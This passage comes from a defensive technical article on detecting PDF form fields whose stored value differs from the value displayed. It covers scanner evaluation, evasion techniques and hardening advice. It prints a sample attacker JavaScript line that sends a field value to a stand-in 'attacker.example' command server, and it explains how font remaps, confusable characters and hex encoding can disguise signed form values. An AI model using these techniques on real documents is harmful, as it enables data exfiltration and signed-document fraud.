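Even under the idealised independence assumption, a true false-positive rate of around 1.6% would still be compatible with the observed zero.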

Comparative Evaluation: Reference Tools vs. V/AP Checks

To provide context for what the structural checks contribute beyond what existing PDF libraries already expose, the core 11-file corpus (5 positive, 6 negative hand-crafted and tool-generated files) was evaluated against two reference implementations: pikepdf and pdfminer.six. These are production-quality PDF libraries widely used in security research and PDF processing pipelines. The 187-file false-positive corpus above provides the broader real-world negative coverage; the comparative evaluation uses the hand-crafted set where ground truth is unambiguous.

| File | Expected | pikepdf v9.x (NeedAppearances + checkbox /V vs /AS only) | pdfminer.six v20251230 (field enumeration only) | This scanner (AP stream text extraction + all checks) |
| --- | --- | --- | --- | --- |
| 01_need_appearances.pdf | Positive | ✓ Detected | ✗ Missed | ✓ Detected |
| 02_checkbox_vap_mismatch.pdf | Positive | ✓ Detected | ✗ Missed | ✓ Detected |
| 03_text_vap_mismatch.pdf | Positive | ✗ Missed | ✗ Missed | ✓ Detected |
| 05_missing_ap.pdf | Positive | ✗ Missed | ✗ Missed | ✓ Detected |
| 06_js_field_conditioning.pdf | Positive | ✗ Missed | ✗ Missed | ✓ Detected |
| 00_clean_match.pdf | Negative | ✗ No indicator | ✗ No indicator | ✗ No indicator |
| 00b_clean_checkbox.pdf | Negative | ✗ No indicator | ✗ No indicator | ✗ No indicator |
| 00c_clean_listbox_opt.pdf | Negative | ✗ No indicator | ✗ No indicator | ✗ No indicator |
| C1_qpdf_generated.pdf | Negative | ✗ No indicator | ✗ No indicator | ✗ No indicator |
| C2_pdflatex_clean.pdf | Negative | ✗ No indicator | ✗ No indicator | ✗ No indicator |
| C3_wkhtmltopdf_invoice.pdf | Negative | ✗ No indicator | ✗ No indicator | ✗ No indicator |

| Method | Detection rate (5 positives) | FP rate (6 negatives) | What it can detect |
| --- | --- | --- | --- |
| pikepdf (direct library) | 2 / 5 (40%) | 0 / 6 (0%) | /NeedAppearances true; checkbox /V vs /AS key comparison. Cannot parse AP stream text operators. |
| pdfminer.six (direct library) | 0 / 5 (0%) | 0 / 6 (0%) | Field enumeration only. No V/AP comparison capability in the library API. |
| This scanner | 5 / 5 (100%) | 0 / 6 (0%) | All five checks: NeedAppearances, checkbox /AS, AP stream text extraction (Tj/TJ operators), blank AP, missing AP; plus /Opt export-value resolution and hex-string /V decoding. |

The pikepdf baseline misses cases 03, 05, and 06 because it implements only the two checks named in the table: the /NeedAppearances flag and the checkbox /V vs /AS comparison. Detecting the text-field mismatch in 03 requires decompressing the /AP /N content stream, parsing Tj/TJ operators, and PDF-unescaping the result, and pikepdf offers no ready-made field-versus-appearance comparison. Detecting those cases requires building on top of the library, not just calling it. This is the implementation work documented in the “Five Structural Indicators” section.

Reproducible Methodology

The complete test procedure is reproducible from this description:

  1. Corpus construction. Positive test files were built from raw PDF bytes by hand — a Python script emitting raw PDF tokens, not calling any PDF library. Each file targets exactly one structural condition. Negative files fall into six categories: hand-crafted clean PDFs; tool-generated PDFs (qpdf --generate-appearances, pdflatex, wkhtmltopdf); 44 US IRS tax forms and 2 US VA agency forms downloaded from their respective official government domains; 4 US federal legislative texts from GovInfo (govinfo.gov); 29 academic papers from arXiv; and 102 Corkami PDF proof-of-concept adversarial files from the corkami/pocs repository (deliberately malformed or structurally unusual PDFs used for PDF parser research). Evasion files used the same raw-byte method with targeted structural variations: hex-encoded /V, Unicode confusable characters, and a custom /Font with /Encoding /Differences remapping a digit glyph. All test files and generation scripts are available from the authors on request.
  2. Scanner under test. HTTP POST to https://pqpdf.com/api.php with operation=pdf-scan and the PDF as a multipart file upload — the same endpoint that powers the interactive scanner at pqpdf.com. Response is JSON with an indicators array; each indicator has a key, risk level, and description.
  3. Classification criterion. A file is classified as a V/AP positive detection if any indicator key contains one of the following scanner-specific strings (tight match against actual engine output): Value/Appearance, NeedAppearances, Has Value But No Appearance, Blank AP Stream, No Appearance Stream, Stored Appearance Streams Stale, Appearance State Mismatch. Generic terms such as “Mismatch” were excluded to avoid conflating V/AP results with unrelated differential-parser indicators (e.g. “PDF Version Mismatch”).
  4. Reference tool evaluation. pikepdf was evaluated programmatically with two checks: the /NeedAppearances flag, and a /V vs /AS string comparison on /FT /Btn fields. pdfminer.six was evaluated via field enumeration; its library API offers no V/AP comparison.
  5. Prediction before scanning. For evasion files, the expected outcome (detected/not detected) was stated in the generation script comment before the file was submitted to the scanner.
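
The classification criterion in step 3 can be sketched as a small function over the parsed JSON response. The marker strings are the ones listed above; the JSON property names `indicators` and `key` are assumptions based on the response description, and the function name is hypothetical.

```python
# Scanner-specific substrings from step 3. Generic terms such as "Mismatch"
# are deliberately absent so unrelated indicators are not counted.
VAP_KEY_MARKERS = (
    "Value/Appearance",
    "NeedAppearances",
    "Has Value But No Appearance",
    "Blank AP Stream",
    "No Appearance Stream",
    "Stored Appearance Streams Stale",
    "Appearance State Mismatch",
)


def is_vap_positive(response: dict) -> bool:
    """True if any indicator key contains one of the V/AP marker strings."""
    for indicator in response.get("indicators", []):
        key = str(indicator.get("key", ""))  # assumed property name
        if any(marker in key for marker in VAP_KEY_MARKERS):
            return True
    return False
```

A response whose only indicator is "PDF Version Mismatch" is therefore not counted as a V/AP detection.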

Normal Interactive PDFs vs. Suspicious Patterns

AcroForms, JavaScript, and automatic actions are standard PDF features used legitimately in millions of documents every day. A sign-and-submit button uses JavaScript. A government tax form uses an AcroForm with /SubmitForm. An e-signature platform uses DocMDP to certify the signed content. A mail-merge system may legitimately produce documents with /NeedAppearances true because it updates /V programmatically without regenerating /AP. None of that is inherently suspicious.

The checks in this article target a specific subset of structural conditions that are rarely present in legitimately authored documents and frequently present in documents where the display and data layers have been deliberately decoupled:

| Feature | Normal use | Suspicious pattern |
|---|---|---|
| AcroForm + JavaScript | Field validation, conditional field visibility, submit-to-URL on a known endpoint | Field value read and posted to an external URL not visible in the document; conditional branch taken only when a specific field equals a pre-seeded value |
| /NeedAppearances true | Programmatic form fill where AP regeneration is deferred (e-signature platforms including DocuSign, as observed behavior; mail merge) | /NeedAppearances true combined with a digital signature: displayed appearance is regenerated from /V at open time and is never the signed /AP stream; structural provenance of what is displayed and what is certified always differs |
| /V vs /AS on a checkbox | Should always match in a well-formed document | Structural mismatch: /V /Yes but /AS /Off; the stored value and displayed state disagree by construction |
| AP stream text vs /V | Should agree after /Opt export-value resolution | AP renders “Approved” while /V holds “Rejected”; or AP stream is blank while /V is non-empty |
| DocMDP P=1 + incremental update | DSS/LTV additions permitted under ISO 32000-2 §12.8.2.2 | Incremental update containing form modifications, annotations, JavaScript, or OpenAction after a P=1 certifying signature |

A scanner finding a V/AP mismatch is not saying “this form is dangerous.” It is saying the file contains a structural condition that is worth examining: the value in the file and the value the viewer renders do not agree, and that disagreement is inside the certified byte range. Whether the cause is a buggy form authoring tool, a careless programmatic fill, or a deliberate manipulation is a question the indicator raises — not one it answers.
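
The checkbox row of the table is the simplest of these conditions to check. The sketch below compares the /V and /AS name objects in the raw bytes of a single widget dictionary; it assumes the dictionary has already been isolated and is not inside a compressed object stream, and the function name is hypothetical.

```python
import re

# A PDF name token after the key: "/" followed by regular characters.
_NAME = rb"/([^\s/<>\[\]()]+)"


def checkbox_state_mismatch(widget_dict: bytes):
    """Return True/False for /V vs /AS disagreement, or None if either is absent."""
    value = re.search(rb"/V\s*" + _NAME, widget_dict)
    state = re.search(rb"/AS\s*" + _NAME, widget_dict)
    if value is None or state is None:
        return None
    return value.group(1) != state.group(1)
```

A `True` result only says the two names differ; as noted above, it raises the question of why rather than answering it.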

JavaScript Field-Value Conditioning: A Behavioral Analysis Gap

JavaScript behavioral emulation executes extracted PDF JavaScript in a sandboxed Node.js vm context with a stub of the Acrobat API. The gap documented here applies to any behavioral sandbox that does not seed doc.getField() with real /V values from the file — returning a stub { value: '' } for every field is the natural default when field enumeration and JS emulation run as independent passes without sharing state.

The practical consequence: when malicious JavaScript reads a field value and acts on it (submitting it to a URL, using it in a conditional branch, passing it to app.launchURL()), the emulator captures the event with an empty string rather than the actual content. Exploitation chains conditioned on field values are not followed correctly:

// Attacker JS inside the PDF
if (doc.getField('status').value == 'approved') {
    app.launchURL('https://attacker.example/c2?v=' + doc.getField('amount').value);
}

With value: '', the condition '' == 'approved' is false — the branch is never taken, the LAUNCH_URL event is never emitted, and the emulator reports clean.

The correct approach: the AcroForm field enumeration pass collects a field_values map (field name → /V string) during widget traversal. The behavioral emulator reads this map and prepends const _pq_fv = {...}; to the stub before execution. doc.getField(name) returns the real value from the file; doc.numFields reflects the true field count. SUBMIT_FORM and LAUNCH_URL events carry the actual field content. Signature fields are excluded — their /V is a PKCS#7 blob, not a meaningful string.
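
The seeding step can be sketched on the Python side of such a pipeline as follows. The `_pq_fv` name comes from the description above; the shape of the enumerated field records (`name`, `type`, `value`) and all function names are assumptions made for illustration.

```python
import json


def collect_field_values(fields: list) -> dict:
    """Build the field name -> /V map, skipping signature fields."""
    return {
        f["name"]: f.get("value", "")
        for f in fields
        if f.get("type") != "Sig"   # /V of a signature field is a PKCS#7 blob
    }


def build_prelude(field_values: dict) -> str:
    """JavaScript line to prepend to the emulator stub before execution."""
    # JSON with ASCII-only escaping is also a valid JavaScript object literal.
    return "const _pq_fv = " + json.dumps(field_values, ensure_ascii=True) + ";"


def stub_get_field(field_values: dict, name: str) -> dict:
    """Python model of the seeded doc.getField(): real value if known, else ''."""
    return {"value": field_values.get(name, "")}
```

With an empty map, `stub_get_field` reproduces the unseeded behaviour and the `'approved'` branch in the attacker script is never reached; with the seeded map, the comparison can succeed.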

DocMDP P=1 and DSS/LTV: What ISO 32000-2 Actually Permits

DocMDP P=1 means the certifying signature permits no modifications to the document whatsoever: not form fill-ins, not annotations, nothing. A naive implementation flags any incremental object after a P=1 signature as a bypass attempt. The problem is that ISO 32000-2 explicitly carves out an exception that such an implementation will violate on a large class of legitimately authored documents.

The relevant specification text is ISO 32000-2 §12.8.2.2 NOTE 2, which explicitly permits DSS (Document Security Store) and LTV (Long Term Validation) additions in an incremental update even under P=1.

DSS carries the material required to validate a digital signature long after the signing certificate’s OCSP responder or CRL distribution point may no longer be online: OCSP responses, certificate revocation lists, and the full certificate chain. Adding this material post-signing is a standard PAdES workflow; it does not modify the certified document content in any MDP sense. Under the naive rule, every legitimately LTV-enabled P=1 document is flagged critical.

The fix detects DSS-only incremental updates: the section contains /DSS or /VRI and has no execution vectors (no JavaScript, no /OpenAction), no annotations, no form elements, and no /AA additional actions. When P=1 and the incremental section is DSS-only, the scanner emits a low-severity informational note citing the spec section rather than a bypass finding. If DSS is mixed with any document modification or execution vector, the full bypass indicator fires as before.
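
A token-level sketch of the DSS-only decision is shown below. It assumes the bytes of the incremental section have already been isolated and are not hidden inside compressed object streams. Which name tokens count as "form elements" (here /Widget and /FT) is an assumption of this sketch, as are the function names and return labels.

```python
import re


def _has_name(section: bytes, name: bytes) -> bool:
    """True if the PDF name /name occurs as a whole token (so /AA != /AAx)."""
    pattern = rb"/" + re.escape(name) + rb"(?![A-Za-z0-9_.\-])"
    return re.search(pattern, section) is not None


DSS_NAMES = (b"DSS", b"VRI")
# Execution vectors, annotations, and form elements that disqualify the update.
BLOCKING_NAMES = (
    b"JavaScript", b"JS", b"OpenAction", b"AA",
    b"Annot", b"Annots", b"Widget", b"FT",
)


def classify_p1_increment(section: bytes) -> str:
    """Return 'dss-only' (informational) or 'bypass' for a post-P=1 update."""
    has_dss = any(_has_name(section, n) for n in DSS_NAMES)
    modified = any(_has_name(section, n) for n in BLOCKING_NAMES)
    if has_dss and not modified:
        return "dss-only"
    return "bypass"
```

Any update that lacks DSS material entirely falls through to the bypass result, matching the conservative default described above.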

Note on scope: FieldMDP and V/AP

Field MDP (FieldMDP, /TransformMethod /FieldMDP) is a distinct transform from DocMDP. Where DocMDP applies a permission level to the entire document, FieldMDP applies per-approval-signature constraints to named form fields, specifying which fields are locked and which are not. Both are detected separately. The DSS/LTV exemption applies to DocMDP P=1 only; FieldMDP constraint validation is unchanged.

FieldMDP is directly relevant to V/AP because it controls which specific field values fall within the coverage of an approval signature. An attacker can craft a FieldMDP that selectively excludes target fields, leaving their values modifiable post-signing while the document carries a valid certification. Three checks are applied: (1) Action=Include with an empty /Fields array — the signature appears to lock fields but locks none; (2) Action=Exclude with named fields — those fields are explicitly not locked, remaining modifiable and V/AP-divergence-susceptible after signing; (3) incremental updates containing /Widget or /AcroForm objects added after a FieldMDP signature — a constraint violation detectable across Acrobat and pdf.js, where validators differ on whether field names are checked against the locked set.
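
The three checks can be sketched over an already-parsed FieldMDP transform parameters dictionary. The dictionary keys mirror the PDF entries /Action and /Fields; the finding labels, the boolean flag for post-signature form objects, and the function name are hypothetical.

```python
def fieldmdp_findings(params: dict, form_objects_added_after: bool = False) -> list:
    """Return labels for the three FieldMDP conditions described above."""
    findings = []
    action = params.get("Action")
    fields = params.get("Fields", [])

    # (1) Include with no fields: appears to lock fields but locks none.
    if action == "Include" and not fields:
        findings.append("include-empty")

    # (2) Exclude with named fields: those fields stay modifiable after signing.
    if action == "Exclude" and fields:
        findings.append("exclude-named:" + ",".join(fields))

    # (3) /Widget or /AcroForm objects added in a later incremental update.
    if form_objects_added_after:
        findings.append("form-objects-after-signature")

    return findings
```

For example, `{"Action": "Exclude", "Fields": ["amount"]}` yields a finding naming `amount` as a field that remains susceptible to V/AP divergence after signing.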

Structural Limits: What Rasterisation Cannot Provide

There is a principled boundary for how far static V/AP analysis can go without rasterisation. Rasterising a field region and running Tesseract against it is technically possible. For deterministic, reproducible forensic analysis that must produce consistent results on the same file across runs, it is the wrong approach for reasons that are architectural, not merely practical.

The problems with rasterisation in this context:

  • Renderer-specific differences — MuPDF and Ghostscript render the same field differently
  • Font fallback differences — missing fonts produce different glyphs on different systems
  • DPI-dependent text segmentation — results change with render resolution
  • OCR nondeterminism — the same raster produces different strings across runs
  • Language-model bias — OCR engines correct toward plausible words, hiding injected content
  • False-positive rates that break the guarantees a forensics engine must provide
  • Unpredictable latency spikes on large form documents

Everything where V/AP divergence is provable from the raw byte stream (the cases where the file and the display disagree by construction) is covered by the five checks described above. Two cases remain that static analysis cannot fully resolve, followed by one limitation of the evaluation itself:

  • Encrypted fields. When the PDF is encrypted and field values or AP streams require a key to decompress, static extraction of /V or AP content is not possible without the password. These checks apply to unencrypted or successfully decrypted content.
  • XFA rendering divergence. XFA forms render through a separate engine (Adobe’s AXTE/XSLT pipeline) distinct from AcroForm rendering. V/AP analysis does not directly apply to XFA-native fields, which carry their own data/display separation in the XDP schema.
  • No broad corpus validation. See the “Validation Scope” subsection above. The empirical gap is acknowledged explicitly, not papered over.

Two evasion paths that were previously limitations are now detected: custom font encoding remaps are resolved via /Encoding /Differences table parsing before comparison; image-based AP streams are flagged structurally when a Do operator is present without text drawing operators (the actual image content cannot be compared without image recognition, but the structural anomaly is surfaced for manual review).
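
The /Encoding /Differences resolution can be illustrated with a minimal sketch. It assumes an ASCII-compatible base encoding for unmapped bytes and uses a deliberately tiny glyph-name table; a real resolver would need a full glyph list. The function names and the table are hypothetical.

```python
import re

# Small illustrative subset of glyph names; not a complete glyph list.
GLYPH_TO_CHAR = {
    "zero": "0", "one": "1", "two": "2", "three": "3", "four": "4",
    "five": "5", "six": "6", "seven": "7", "eight": "8", "nine": "9",
    "period": ".", "comma": ",", "space": " ",
}


def parse_differences(array_src: str) -> dict:
    """Parse a /Differences array such as '[49 /nine]' into {code: glyph}."""
    mapping = {}
    code = None
    for token in re.findall(r"/[^\s/\[\]]+|\d+", array_src):
        if token.startswith("/"):
            if code is not None:
                mapping[code] = token[1:]
                code += 1            # consecutive names take consecutive codes
        else:
            code = int(token)
    return mapping


def rendered_text(raw: bytes, differences: dict) -> str:
    """Map AP string bytes to the characters the remapped font would draw."""
    out = []
    for byte in raw:
        glyph = differences.get(byte)
        if glyph is None:
            out.append(chr(byte))    # assumption: ASCII-compatible base encoding
        else:
            out.append(GLYPH_TO_CHAR.get(glyph, "\ufffd"))
    return "".join(out)
```

With a remap of byte 0x31 to /nine, the AP bytes `1200.00` resolve to `9200.00`, which no longer matches a /V of `1200.00`.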

Adversarial Evasion Paths

An attacker who knows the detection logic can attempt to evade it. Being explicit about viable evasion paths is more useful than avoiding the topic:

| Evasion technique | How it works | Detected? |
|---|---|---|
| Font encoding remap (E3) | AP stream has (1200.00) Tj; custom /Font maps glyph 0x31 (“1”) to the visual glyph for “9” via /Encoding /Differences [49 /nine]. Viewer renders 9200.00. Naive text extraction reads 1200.00, which matches /V. No mismatch without glyph table resolution. | Confirmed detected: E3_font_remap_evasion.pdf re-scanned after fix; [HIGH] Value/Appearance Mismatch fired. The scanner resolves /Encoding /Differences tables before comparison: byte 0x31 → glyph /nine → “9”, so rendered text 9200.00 is correctly compared against /V 1200.00. Deception 75 → high-risk. |
| Image-based AP (E4) | AP stream draws a rasterised image via Do operator with an XObject. /V holds text. No text operators to extract. | Structurally detected: E4_image_ap_structural.pdf scanned; [HIGH] “Image-Based Appearance Stream — V Not Visually Verifiable” fired. Deception 25 → suspicious. The actual image content cannot be compared to /V without image recognition, but the structural anomaly (Do present, no Tj/TJ) is deterministic and surfaced for manual review. |
| Unicode confusables (E2) | AP renders аpproved (Cyrillic U+0430 “а”); /V is (approved) (Latin “a”). Bytes differ; visual appearance is identical. | Confirmed detected: E2_unicode_confusable.pdf scanned; [HIGH] Value/Appearance Mismatch fired. Deception 25 → suspicious. |
| Hex-encoded /V (E1) | /V <52656a6563746564> encodes “Rejected”. Naive string comparison reads angle-bracket hex, not decoded text; mismatch against AP rendering “Approved” is missed. | Confirmed detected: E1_hex_v_evasion.pdf scanned; [HIGH] Value/Appearance Mismatch fired. Hex decode and UTF-16BE detection verified. Deception 25 → suspicious. |
| Whitespace normalisation tricks | AP renders (Amount:   $1,200) with double-space; /V is (Amount: $1,200). After whitespace normalisation, strings match; mismatch is not flagged. | No, by design. Genuine whitespace variance is common in legitimately authored forms, and flagging it would produce false positives on real documents. |
| Encrypted AP stream | PDF is encrypted; AP decompression requires the document key. Without the password, AP content is inaccessible. | No (acknowledged); checks apply only to unencrypted or decrypted content. |
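
The hex-string case (E1) comes down to decoding /V before comparing. A minimal sketch, assuming the token includes its angle brackets and treating non-UTF-16 bytes as Latin-1 (an approximation of PDFDocEncoding); the function name is hypothetical.

```python
import re


def decode_hex_string(token: str) -> str:
    """Decode a PDF hex string such as '<52656a6563746564>' to text."""
    digits = re.sub(r"\s+", "", token.strip()[1:-1])  # whitespace is ignored
    if len(digits) % 2:
        digits += "0"            # a missing final digit is treated as 0
    raw = bytes.fromhex(digits)
    if raw.startswith(b"\xfe\xff"):                    # UTF-16BE byte order mark
        return raw[2:].decode("utf-16-be", errors="replace")
    return raw.decode("latin-1")  # assumption: approximates PDFDocEncoding
```

Here `decode_hex_string("<52656a6563746564>")` returns `"Rejected"`, which can then be compared against the extracted AP text.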

Font encoding remap and image-based AP were previously undetectable evasion paths; both are now addressed. Font encoding is resolved via glyph table lookup before comparison; image-based AP is flagged structurally so it reaches manual review. Encrypted AP and XFA rendering remain outside static analysis scope. Both remaining gaps require the document key, a full rendering engine, or both; neither is addressable with static byte-stream inspection alone.
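
The structural flag for image-based appearance streams (a Do operator with no Tj/TJ) can be sketched as a pair of regular expressions over an already-decompressed content stream. The function name is hypothetical, and only the Tj and TJ text operators named above are considered.

```python
import re

# "/Name Do": paint an XObject (image or form).
_DO_OP = re.compile(rb"/[^\s/<>\[\]()]+\s+Do\b")
# A string or array operand followed by Tj or TJ.
_TEXT_OP = re.compile(rb"[)\]>]\s*T[jJ]\b")


def is_image_only_appearance(content: bytes) -> bool:
    """True when the stream paints an XObject and shows no text."""
    return bool(_DO_OP.search(content)) and not _TEXT_OP.search(content)
```

A `True` result says nothing about what the image shows; it only marks the field as one whose displayed value cannot be checked against /V without rendering.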

An Open Question: DocMDP P=2 and Incremental Form Fill-ins

DocMDP P=2 permits form fill-ins and digital signatures but prohibits any other modification. The interaction between P=2 and incremental form fill-ins warrants careful consideration. The specific edge case: a viewer that fills a form field incrementally under P=2, updating /V in the incremental section, is acting within the permission. If the viewer also regenerates the /AP stream in the same incremental section, whether that counts as a permitted modification depends on whether the validator treats AP regeneration as a document change.

The practical consequence: a certified P=2 document could have been legitimately filled, producing an incremental /AP update that some validators accept and others reject. A conservative implementation flags all incremental object additions under P=2 that contain form elements as potential violations. Whether a specific update is legitimate depends on whether it was generated by a compliant form-fill operation or by an attacker modifying fields outside the permitted scope. This is a known nuance, not a confirmed false positive, and the spec does not resolve it unambiguously.

Current scanner behaviour: All incremental updates that contain form elements (/Widget annotations or /AcroForm entries) under a P=2 DocMDP constraint are flagged as potential constraint violations. This is intentionally conservative — the flag surfaces the condition for manual review. Whether a specific incremental update represents a legitimate form fill-in or an out-of-scope modification requires context that static analysis alone cannot determine. Corpus data: 1 of 196 scanned files triggered a FieldMDP Bypass indicator — a US congressional bill (BILLS-116s3548is, US Senate 116th Congress) that carries incremental updates containing form elements after a FieldMDP certification signature; scored 601 (false positive). All 44 IRS forms and both VA agency forms produced zero MDP bypass indicators.

Safe Handling and Configuration

The technical findings above have practical consequences for anyone who receives, processes, or routes PDF forms. These are not theoretical edge cases — they apply to signed contracts, regulatory filings, and any workflow where a PDF form value is treated as authoritative.

For Individuals: Viewer Settings

  • Disable JavaScript in Acrobat: Edit → Preferences → JavaScript → uncheck “Enable Acrobat JavaScript.” Most form functionality works without it. JS is only required for complex field validation and multi-step wizards.
  • Use Protected Mode / Protected View: Acrobat Reader’s Protected Mode (Windows, enabled by default since Reader X) sandboxes the renderer in a low-privilege process. Confirm it is active under Edit → Preferences → Security (Enhanced). Disable “trust files in my Documents folder” if you receive external forms.
  • Open in a browser for untrusted files: Firefox opens PDFs in pdf.js and Chrome in its built-in PDFium renderer; neither exposes the full Acrobat JavaScript API. This does not prevent V/AP divergence from affecting the display, but it substantially narrows the JavaScript execution surface.
  • Verify fields independently: For any signed document where field values are legally or financially significant, confirm the visible value matches the form data by checking document properties or exporting form data as FDF/XFDF and comparing to what you see.

For Developers and Pipelines

  • Never trust /AP for authoritative field values. If you are processing form submissions from a PDF, read /V from the AcroForm dictionary, not text extracted from the appearance stream. Use a library that exposes the AcroForm object model (PyMuPDF, pdfminer.six, iText) rather than one that renders and OCRs.
  • Sanitize before storing: Strip /AP streams and rebuild them from /V when your pipeline is the authoritative writer. This eliminates divergence introduced by upstream tools. qpdf --generate-appearances regenerates appearance streams from field values.
  • Reject /NeedAppearances true in signed documents: If your pipeline accepts signed PDFs and treats them as authoritative, a file with /NeedAppearances true and a digital signature should be rejected or flagged for manual review — the signed content and the displayed content structurally cannot match.
  • Run forms through a static scanner before ingestion: If your system auto-processes form submissions (extract field values, trigger payment, update a record), scan the PDF before extraction. The field-value conditioning pattern — JavaScript that reads /V and posts it conditionally — is detectable statically and is rarely present in legitimately authored forms.
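
The "reject /NeedAppearances true in signed documents" rule can be approximated with a raw-byte pre-filter. This is a sketch under stated assumptions: it treats any /ByteRange array as evidence of a signature, and it will miss either token if it sits inside a compressed object stream. The function name is hypothetical.

```python
import re

_NEED_APPEARANCES = re.compile(rb"/NeedAppearances\s+true\b")
_SIGNATURE = re.compile(rb"/ByteRange\s*\[")   # assumption: marks a signature


def needs_manual_review(pdf_bytes: bytes) -> bool:
    """True when /NeedAppearances true coexists with a signature byte range."""
    has_flag = _NEED_APPEARANCES.search(pdf_bytes) is not None
    is_signed = _SIGNATURE.search(pdf_bytes) is not None
    return has_flag and is_signed
```

A pipeline would typically route a `True` result to manual review rather than silently dropping the file, since the flag alone has legitimate causes.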

For Enterprise and IT

  • Group Policy (Windows): Adobe provides ADMX templates for Acrobat and Reader. Key settings include bEnableJS (disable JavaScript), bEnhancedSecurityInBrowser, and bEnhancedSecurityStandalone. These are available via the Adobe Enterprise Toolkit.
  • Email gateway configuration: Most email security gateways support PDF content inspection but vary in how deeply they inspect AcroForm structure. Where possible, configure your gateway to flag PDFs with JavaScript, OpenAction, and SubmitForm for manual review rather than auto-delivering them. /NeedAppearances true in combination with a signature is a narrower, more reliable signal.
  • Document verification workflows: For high-value signed documents (contracts, financial forms), consider a two-step verification: signature validation confirming the byte range is intact, followed by a structural audit confirming no V/AP divergence indicators. These are independent checks and both are necessary.
  • XFA: XFA forms are deprecated in PDF 2.0 and are not supported by many modern viewers, but Acrobat still renders them. If your environment has no business need to receive XFA forms, blocking them at the gateway eliminates a scripting attack surface that is distinct from AcroForm JavaScript and not always covered by the same scanner rules.

Detection Methodology Reference

The following table summarises the V/AP structural checks documented in this article. All operate on the raw PDF object model and do not require rendering. Severity escalates when indicators combine — the compound patterns in the weighted correlation analysis are documented in the “Correlation Engine Compound Patterns” table above.

| Structural check | What it finds | Severity conditions |
|---|---|---|
| /NeedAppearances true | AP streams are stale by construction; viewer regenerates from /V at open time | Medium alone; Critical when a digital signature is also present |
| Checkbox/radio /V vs /AS key comparison | Stored data value and displayed appearance state structurally disagree | High; Critical when inside a signed byte range |
| AP stream text extraction (text fields) | Tj/TJ operators reconstructed and compared to /V; literal and hex-string encoding handled | High; Critical when signed |
| AP stream text extraction (listbox/combobox) | Multi-select array extraction; /Opt export→display map resolved before comparison to prevent false positives on choice fields | High; Critical when signed |
| Blank AP stream | AP stream present but contains no text drawing operators: value in file, field renders blank | Medium |
| Missing AP (/V set, no /AP) | Display is viewer-defined via /DA and is not statically present in the file | Medium |
| Field-value seeding in JS behavioral analysis | doc.getField() stub receives real /V values; conditional exploitation chains that gate on field content are correctly followed | Applies to any JS indicator elevated by field-value conditioning |
| DocMDP P=1 + DSS-only incremental update | Incremental section contains /DSS or /VRI and no execution vectors, annotations, or form elements; permitted under ISO 32000-2 §12.8.2.2 | Low (informational); full bypass severity if DSS is mixed with execution vectors |
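
The severity column for the first six rows can be read as a small lookup with one escalation rule. The sketch below encodes just that reading; the check identifiers and function name are hypothetical, and it does not model the compound correlation patterns mentioned above.

```python
# Base severity per structural check, as listed in the table.
BASE_SEVERITY = {
    "need_appearances": "medium",
    "checkbox_state_mismatch": "high",
    "ap_text_mismatch_text": "high",
    "ap_text_mismatch_choice": "high",
    "blank_ap": "medium",
    "missing_ap": "medium",
}

# Checks the table marks as Critical when a signature is involved.
ESCALATES_WHEN_SIGNED = {
    "need_appearances",
    "checkbox_state_mismatch",
    "ap_text_mismatch_text",
    "ap_text_mismatch_choice",
}


def severity(check: str, signed: bool) -> str:
    """Return the table's severity for one check, escalating when signed."""
    if signed and check in ESCALATES_WHEN_SIGNED:
        return "critical"
    return BASE_SEVERITY[check]
```

For instance, `severity("need_appearances", signed=True)` gives `"critical"`, while `severity("blank_ap", signed=True)` stays at `"medium"`.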

PDF has accumulated three decades of features with no removal path, and the complexity around those features is the context for everything above. The checks above are designed to avoid false positives on legitimately authored documents; the /Opt export-value resolution and hex-string /V handling were added specifically to handle valid authoring patterns that naive string comparison would misread. Edge cases are possible; the structural indicators raise questions, not verdicts.


Frequently Asked Questions

What is V/AP divergence in PDF AcroForm fields?

In a PDF AcroForm, every field stores its value in two independent locations: /V (the machine-readable data value read by JavaScript, form submission engines, and digital signature byte-range hashing) and /AP /N (the appearance stream the PDF viewer renders as pixels on screen). These stores are not derived from each other. V/AP divergence occurs when they disagree — the viewer displays one thing while the machine-readable value contains another. A digital signature can certify both while they structurally disagree.

Can a digitally signed PDF show different values to a human and to automated processing?

Yes. A digital signature certifies a byte range covering both /V and /AP. If an author sets /V to one amount and authors an /AP stream rendering a different figure, both are inside the certified byte range. The human signer sees what /AP renders; any JavaScript, form submission, or downstream automated system reads /V. The signature remains valid because the byte range is intact — it certifies content that structurally disagrees within itself.

What does /NeedAppearances true mean for a digitally signed PDF?

When /NeedAppearances true is present in the AcroForm dictionary (ISO 32000 §12.7.2), the viewer regenerates appearance streams from /V field values at document open time — the /AP streams stored on disk are stale by construction. Combined with a digital signature, the byte-range hash covers the stale /AP, but the viewer regenerates the appearance from /V after opening. The provenance of what is displayed and what was certified is always structurally different.

How can V/AP divergence be detected without rendering the PDF?

Five static checks operate directly on the raw PDF object model: (1) /NeedAppearances detection via regex against the AcroForm dictionary; (2) Checkbox and radio /V vs /AS key comparison — a pure string comparison of two name objects; (3) AP stream text extraction — decompress the /AP /N content stream, parse Tj/TJ operators, PDF-unescape and whitespace-normalise, compare to /V with hex-string decoding and /Opt export-value resolution; (4) Blank AP stream detection; (5) Missing AP detection. None require opening the file in a viewer.

What is DocMDP P=1 and why does the DSS/LTV exemption matter?

DocMDP P=1 is a certifying signature permission level that prohibits all modifications to a PDF after signing. ISO 32000-2 §12.8.2.2 NOTE 2 explicitly exempts DSS (Document Security Store) and LTV (Long Term Validation) additions — these carry OCSP responses, CRLs, and certificate chains needed to validate the signature long after the signing certificate’s OCSP responder may be offline. A scanner that flags all incremental updates under P=1 as bypass attempts will produce false positives on every legitimately LTV-enabled document.

What is the difference between a PDF form field’s /V value and its /AP /N appearance stream?

/V is the field’s machine-readable value — read by JavaScript (doc.getField().value), included in form submissions, and covered by the digital signature byte-range hash. /AP /N is a self-contained PDF content stream the viewer renders as pixels — it is what the user sees on screen. The two are authored independently, are not derived from each other, and only the viewer reads /AP. Everything else — JavaScript, submission engines, signature validators — reads /V.

How does JavaScript field-value conditioning work as a PDF attack technique?

A malicious PDF can contain OpenAction JavaScript that reads a form field value and conditionally launches a URL or posts data only when that value matches a specific string such as ‘approved’. If a behavioral sandbox returns empty strings for all getField() calls — the natural default when field enumeration and JS emulation run as independent passes — the conditional is never satisfied and the sandbox reports clean. Correct detection requires seeding the JS emulator with real /V values extracted from the AcroForm field dictionaries before execution.

Which PDF authoring tools produce legitimate /NeedAppearances true documents?

